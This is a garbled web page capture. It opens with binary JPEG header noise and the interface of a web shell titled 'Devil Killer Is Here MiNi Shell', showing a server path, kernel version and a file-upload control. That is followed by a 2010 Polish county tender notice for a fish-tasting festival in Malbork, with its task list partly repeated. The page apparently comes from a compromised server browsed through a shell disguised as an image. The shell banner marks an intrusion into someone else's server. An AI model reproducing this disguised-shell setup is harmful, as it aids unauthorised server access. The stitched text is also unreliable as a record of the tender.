JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100713/206564-N-2010.html

<p class="kh_header"><b>Malbork: Organizacja imprezy plenerowej Powiat Malborski- Spotkajmy się przy rybce w dniu 21 sierpnia 2010 roku i pakiet usług promocyjno- degustacyjnych</b><br>
<b>Numer ogłoszenia: 206564 - 2010; data zamieszczenia: 13.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Malborski reprezentowany przez Zarząd Powiatu Malborskiego , Plac Słowiański 17, 82-200 Malbork, woj. pomorskie, tel. 055 6460400.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.malbork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja imprezy plenerowej Powiat Malborski- Spotkajmy się przy rybce w dniu 21 sierpnia 2010 roku i pakiet usług promocyjno- degustacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest   organizacja imprezy plenerowej Powiat Malborski-
      Spotkajmy się przy rybce w dniu 21 sierpnia 2010roku , i  pakiet usług 
       promocyjno-degustacyjnych  w ramach Programu Operacyjnego    Zrównoważony rozwój 
       sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013  

  Zadanie nr  I: Przedmiotem zamówienia jest organizacja imprezy masowej w dniu 21.08.2010r w tym realizacja wymagań organizacyjno-technicznych 
 niezbędnych dla przeprowadzenia imprezy masowej, realizacja pakietu 
  usług promocyjno-degustacyjnych, w tym pokazy towarzyszące, m.in. 
  autorski  pokaz kulinarny, organizacja konkursów, reklama i promocja 
   przedsięwzięcia.
 Przedmiot  zamówienia obejmuje:

1. Projekt, wykonanie i powieszenie banera o wymiarach 6 x 2 m	
Planuje się powieszenie banera na murze Zamku Malborskiego przy wejściu do Muzeum. Baner rozwieszony dwa tygodnie przez imprezą będzie zawierał hasło przewodnie, datę i miejsce imprezy oraz logotypy instytucji finansujących.
2. Projekt i produkcja plakatów informacyjno - promocyjnych: format B2, kolor, papier kredowy
Zakłada się wykonanie 1000 plakatów, które zostaną rozwieszone na dwa tygodnie przed imprezą na terenie całego Powiatu. Plakaty będą zawierały hasło przewodnie, datę i miejsce imprezy, logotypy instytucji finansujących oraz informacje o planowanym przebiegu imprezy.

3. Projekt i wykonanie banera reklamowego (animacja) na stronę internetową Starostwa Powiatowego w Malborku.
Zakłada się wykonanie banera reklamowego, który zostanie zamieszczony na stronie Starostwa Powiatowego w Malborku. Baner ma zawierać animację poruszającej się ryby wraz informacją o korzyściach płynących ze spożywania produktów rybnych. 

4. Zamieszczenie informacji o imprezie w prasie lokalnej (pół strony w wydaniach poprzedzających imprezę)
Zakłada się publikację zaproszenia do uczestnictwa w imprezie w prasie lokalnej w formie półstronicowego ogłoszenia zamieszczanego w Gazecie Malborskiej w dwóch wydaniach poprzedzających imprezę oraz w Dzienniku Malborskim (dodatek lokalny do Dziennika Bałtyckiego) w trzech wydaniach poprzedzających imprezę. 
Ogłoszenie będzie miało wielkość ? strony i będzie zawierało hasło przewodnie, datę i miejsce imprezy, logotypy instytucji finansujących oraz informacje o planowanym przebiegu imprezy.
 
5. Ustawienie 10 śmietników i 1 kontenera, które zostaną wynajęte na czas imprezy - zaplanowano 10 śmietników o pojemności 120 litrów oraz jeden kontener o pojemności 1100 litrów;

6. Usługa sprzątania po imprezie - konieczne jest zapewnienie czystości i porządku miejsca realizacji imprezy po jej zakończeniu .

7. Ustawienie sanitariatów typu TOI-TOI - wynajem kabin sanitarnych, które zostaną wynajęte na czas imprezy - zaplanowano 10 kabin o normalnym standardzie wyposażenia;

8. Ubezpieczenie  imprezy - ze względu na konieczność zabezpieczenia się przed potencjalnymi roszczeniami osób fizycznych i prawnych związanych z organizacją imprezy konieczny jest zakup polisy od odpowiedzialności cywilnej organizatora imprezy;

9. Ochrona imprezy (min. 30 osób x 12h) - w celu zapewnienia bezpieczeństwa podczas trwania imprezy konieczny jest wynajem pracowników ochrony; uwzględniając planowaną liczbę uczestników konieczne jest wynajęcie co najmniej 30 pracowników ochrony po dwanaście godzin co przekłada się na min. 360 roboczogodzin;

10. Wynajem barierek ochronnych (130 szt. x  2m) - w celu zapewnienia bezpieczeństwa przy scenie oraz podczas trwania konkursów konieczny jest wynajem barierek ochronnych o łącznej długości 260 mb;

11. Wynajem jednej karetki (lekarz, sanitariusz i pielęgniarka) - konieczne jest zapewnienie obecności zespołu medycznego z karetką (lekarz + sanitariusz + pielęgniarka) przez czas trwania imprezy tj. przez 8 godzin;

12. Wynajem zadaszonej sceny o wymiarach 10 X 10 m - w celu zapewnienia odpowiedniego miejsca prezentacji pokazów gotowania, przeprowadzania części konkursów oraz prowadzenia imprezy przez konferansjera i dietetyka konieczny jest wynajem przenośnej sceny plenerowej o wymiarach 10 x 10 m wraz z zadaszeniem;

13. Wynajem aparatury nagłośnieniowej o mocy 2 x10 KW oraz oraz oświetlenia 1000 W) Aby zapewnić odpowiednie nagłośnienie oraz oświetlenie sceny konieczny jest wynajem specjalistycznej plenerowej aparatury nagłośnieniowej o mocy 2 x 10 kW oraz aparatury oświetleniowej o mocy 1000 W;

14. Wynajem scenografii imprezy o tematyce związanej ze spożyciem ryb - scena musi posiadać scenografię o tematyce rybnej dostosowaną do charakteru imprezy (np. sieci i osprzęt rybacki, plansze z rybami, zdjęcia potraw rybnych itp.)
15. Zaangażowanie zawodowego konferansjera, który zapowie poszczególne punkty programu, przedstawi kucharza oraz inne osoby prezentujące się na scenie jak i urozmaici imprezę dowcipami i zapewni profesjonalne przeprowadzenie imprezy

16. Przygotowanie i poprowadzenie bloku tematycznego poświęconego potrawom z ryb przez mistrza kuchni. Wynajęty mistrz kuchni przeprowadzi autorski pokaz poświęcony potrawom z ryb co znacznie uatrakcyjni imprezę oraz zachęci uczestników do samodzielnego przygotowywania potraw z ryb

17. Honorarium 2 osób prowadzącego konkursy. Planowane do przeprowadzenia konkursy dla publiczności będą ściśle związane z rybami oraz produktami rybnymi i będą prowadzone przez dwie wynajęte osoby. Dla zwycięzców oraz uczestników konkursów przewidziano drobne nagrody rzeczowe (książki kucharskie (dania rybne), wędki, kołowrotki, torby, parasolki). Na większości nagród znajdować się będą nadruki zawierające nazwę i hasło imprezy, logotypy instytucji finansujących;

18. Zakup nagród konkursowych (książki kucharskie - danie rybne - 15 szt. wędki -15 szt. kołowrotki - 15 szt., torby - 50 sztuk, parasolki - 20 szt.)

19. Zakup gadżetów promocyjnych: jednokolorowe koszulki T-shirt z nadrukiem dwustronnym (przód i tył / ramię - bawełna, sitodruk, różne rozmiary i kolory) 200 szt; czapeczki (daszek) z nadrukiem - 100 szt.; baloniki z nadrukiem - 1000 szt.; kubki 100 szt;

20. Zaprojektowanie i wydruk ulotek promocyjnych format A5, kolor 4+4, papier kredowy. Zakłada się rozpowszechnienie w trakcie imprezy pięciu tysięcy ulotek zawierających krótkie informacje o projekcie wraz z logotypami instytucji finansujących, informacje o prozdrowotnych cechach potraw rybnych oraz sprawdzone przepisy na potrawy rybne;

21. Dystrybucja ulotek w trakcie imprezy (7 godzin przez 3 osoby). Zakłada się rozpowszechnienie w trakcie imprezy pięciu tysięcy ulotek zawierających krótkie informacje o projekcie wraz z logotypami instytucji finansujących, informacje o prozdrowotnych cechach potraw rybnych oraz sprawdzone przepisy na potrawy rybne.


Miejsce realizacji zamówienia:  Międzymurze Muzeum Zamkowego w Malborku

 Zadanie nr  II:   Przedmiotem zamówienia jest  przygotowanie i  organizacja, degustacji potraw z ryb podczas imprezy masowej w dniu 21.08.2010r
                                
Przedmiot  zamówienia obejmuje

 Degustacja ryb i produktów rybnych 
1.)Zakłada się dystrybucję wśród uczestników dziesięciu tysięcy porcji degustatorskich dziesięciu różnych rodzajów potraw rybnych (każda potrawa po 1000 porcji) - ryba po grecku, filet z marynowanego pstrąga, flądra smażona, makrela z grilla, zupa rybna, karp z pieczarkami w śmietanie, karp w occie, łosoś wędzony carpacio, śledź w 3 smakach, ryba w pikantnej zalewie). 
Zakłada się, że porcja powinna ważyć nie mniej niż 50 gram i być podawana w naczyniu oraz ze sztućcami.
2.) sprawne przeprowadzenie degustacji w godzinach od 12 do 19 dnia 21 sierpnia 2010r.Zabezpieczenie sprawnego wydawania porcji degustacyjnych zgodnie z ogólnie obowiązujacymi przepisami, zapewnienie należytego porządku w miejscu wydawania i spożywania porcji degustacyjnych z ryb, logistyka degustacji,zapewnienie nalezytej czystości terenu podczas wydawania porcji degustacyjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2, 79.34.22.00-5, 79.34.10.00-6, 79.71.00.00-4, 55.32.00.00-6, 55.32.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu obowiązany jest wnieść wadium w wysokości:
Zadanie Nr I  - 4000,00 zł (słownie: cztery tysiące złotych)
Zadanie nr II - 2000,00 zł  (słownie: dwa tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli posiada uprawnienia do wykonywania okreslonej działalnosci lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeśli wykaże, że należycie wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy
- w tym okresie, usługi polegające na organizacji i prowadzeniu imprez masowych, oraz usługi promocyjno degustacyjne których należyte wykonanie potwierdzi dokumentami, w tym:

- dla Zadania nr   I - co najmniej dwie usługi na organizację i prowadzenie imprez masowych o wartości nie mniejszej niż  150.000,00 zł brutto każda
  
- dla Zadania Nr II - co najmniej dwie usługi promocyjno degustacyjne o wartości nie mniejszej niż   80.000,00 zł brutto każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeśli posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w tym:

- dla Zadania Nr  I - na kwotę minimum    -    200 000 ,00 zł    
- dla Zadania Nr II - na kwotę minimum    -    100 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w kraju pochodzenia osoby lub w kraju, w ktorym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o ktorych mowa powyżej w pkt III.4.3.1) zastepuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorzadu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w ktorym Wykonawca ma siedzibę lub miejsce zamieszkania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.malbork.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia mozna uzyskać pod adresem:
Starostwo Powiatowe  82-200 Malbork  Plac Słowiański 17  pokój nr 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2010 godzina 09:00, miejsce: Starostwo Powiatowe 82-200 Malbork  Plac Słowiński 17 pokój nr 24 ( Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013 w ramach środka 3.4 Rozwój nowych rynkow i kampanie promocyjne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja imprezy masowej Powiat Malborski - Spotkajmy sie przy rybce w dniu 21.08.2010r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja imprezy masowej w dniu  21.08.2010r w tym realizacja wymagań organizacyjno-technicznych 
niezbędnych dla przeprowadzenia imprezy masowej, realizacja pakietu 
usług promocyjno-degustacyjnych, w tym pokazy towarzyszące, m.in.autorski  pokaz kulinarny, organizacja konkursów, reklama i promocja 
przedsięwzięcia.
 Przedmiot  zamówienia obejmuje:

1. Projekt, wykonanie i powieszenie banera o wymiarach 6 x 2 m	
Planuje się powieszenie banera na murze Zamku Malborskiego przy wejściu do Muzeum. Baner rozwieszony dwa tygodnie przez imprezą będzie zawierał hasło przewodnie, datę i miejsce imprezy oraz logotypy instytucji finansujących.
2. Projekt i produkcja plakatów informacyjno - promocyjnych: format B2, kolor, papier kredowy
Zakłada się wykonanie 1000 plakatów, które zostaną rozwieszone na dwa tygodnie przed imprezą na terenie całego Powiatu. Plakaty będą zawierały hasło przewodnie, datę i miejsce imprezy, logotypy instytucji finansujących oraz informacje o planowanym przebiegu imprezy.
3. Projekt i wykonanie banera reklamowego (animacja) na stronę internetową Starostwa Powiatowego w Malborku.
Zakłada się wykonanie banera reklamowego, który zostanie zamieszczony na stronie Starostwa Powiatowego w Malborku. Baner ma zawierać animację poruszającej się ryby wraz informacją o korzyściach płynących ze spożywania produktów rybnych. 

4. Zamieszczenie informacji o imprezie w prasie lokalnej (pół strony w wydaniach poprzedzających imprezę)
Zakłada się publikację zaproszenia do uczestnictwa w imprezie w prasie lokalnej w formie półstronicowego ogłoszenia zamieszczanego w Gazecie Malborskiej w dwóch wydaniach poprzedzających imprezę oraz w Dzienniku Malborskim (dodatek lokalny do Dziennika Bałtyckiego) w trzech wydaniach poprzedzających imprezę. 
Ogłoszenie będzie miało wielkość ? strony i będzie zawierało hasło przewodnie, datę i miejsce imprezy, logotypy instytucji finansujących oraz informacje o planowanym przebiegu imprezy.
 
5. Ustawienie 10 śmietników i 1 kontenera, które zostaną wynajęte na czas imprezy - zaplanowano 10 śmietników o pojemności 120 litrów oraz jeden kontener o pojemności 1100 litrów;

6. Usługa sprzątania po imprezie - konieczne jest zapewnienie czystości i porządku miejsca realizacji imprezy po jej zakończeniu .
7. Ustawienie sanitariatów typu TOI-TOI - wynajem kabin sanitarnych, które zostaną wynajęte na czas imprezy - zaplanowano 10 kabin o normalnym standardzie wyposażenia;

8. Ubezpieczenie imprezy - ze względu na konieczność zabezpieczenia się przed potencjalnymi roszczeniami osób fizycznych i prawnych związanych z organizacją imprezy konieczny jest zakup polisy od odpowiedzialności cywilnej organizatora imprezy;

9. Ochrona imprezy (min. 30 osób x 12h) - w celu zapewnienia bezpieczeństwa podczas trwania imprezy konieczny jest wynajem pracowników ochrony; uwzględniając planowaną liczbę uczestników konieczne jest wynajęcie co najmniej 30 pracowników ochrony po dwanaście godzin co przekłada się na min. 360 roboczogodzin;

10. Wynajem barierek ochronnych (130 szt. x  2m) - w celu zapewnienia bezpieczeństwa przy scenie oraz podczas trwania konkursów konieczny jest wynajem barierek ochronnych o łącznej długości 260 mb;

11. Wynajem jednej karetki (lekarz, sanitariusz i pielęgniarka) - konieczne jest zapewnienie obecności zespołu medycznego z karetką (lekarz + sanitariusz + pielęgniarka) przez czas trwania imprezy tj. przez 8 godzin;

12. Wynajem zadaszonej sceny o wymiarach 10 X 10 m - w celu zapewnienia odpowiedniego miejsca prezentacji pokazów gotowania, przeprowadzania części konkursów oraz prowadzenia imprezy przez konferansjera i dietetyka konieczny jest wynajem przenośnej sceny plenerowej o wymiarach 10 x 10 m wraz z zadaszeniem;

13. Wynajem aparatury nagłośnieniowej o mocy 2 x10 KW oraz oraz oświetlenia 1000 W) Aby zapewnić odpowiednie nagłośnienie oraz oświetlenie sceny konieczny jest wynajem specjalistycznej plenerowej aparatury nagłośnieniowej o mocy 2 x 10 kW oraz aparatury oświetleniowej o mocy 1000 W;

14. Wynajem scenografii imprezy o tematyce związanej ze spożyciem ryb - scena musi posiadać scenografię o tematyce rybnej dostosowaną do charakteru imprezy (np. sieci i osprzęt rybacki, plansze z rybami, zdjęcia potraw rybnych itp.);

15. Zaangażowanie zawodowego konferansjera, który zapowie poszczególne punkty programu, przedstawi kucharza oraz inne osoby prezentujące się na scenie jak i urozmaici imprezę dowcipami i zapewni profesjonalne przeprowadzenie imprezy;

16. Przygotowanie i poprowadzenie bloku tematycznego poświęconego potrawom z ryb przez mistrza kuchni. Wynajęty mistrz kuchni przeprowadzi autorski pokaz poświęcony potrawom z ryb co znacznie uatrakcyjni imprezę oraz zachęci uczestników do samodzielnego przygotowywania potraw z ryb;

17. Honorarium 2 osób prowadzącego konkursy. Planowane do przeprowadzenia konkursy dla publiczności będą ściśle związane z rybami oraz produktami rybnymi i będą prowadzone przez dwie wynajęte osoby. Dla zwycięzców oraz uczestników konkursów przewidziano drobne nagrody rzeczowe (książki kucharskie (dania rybne), wędki, kołowrotki, torby, parasolki). Na większości nagród znajdować się będą nadruki zawierające nazwę i hasło imprezy, logotypy instytucji finansujących;

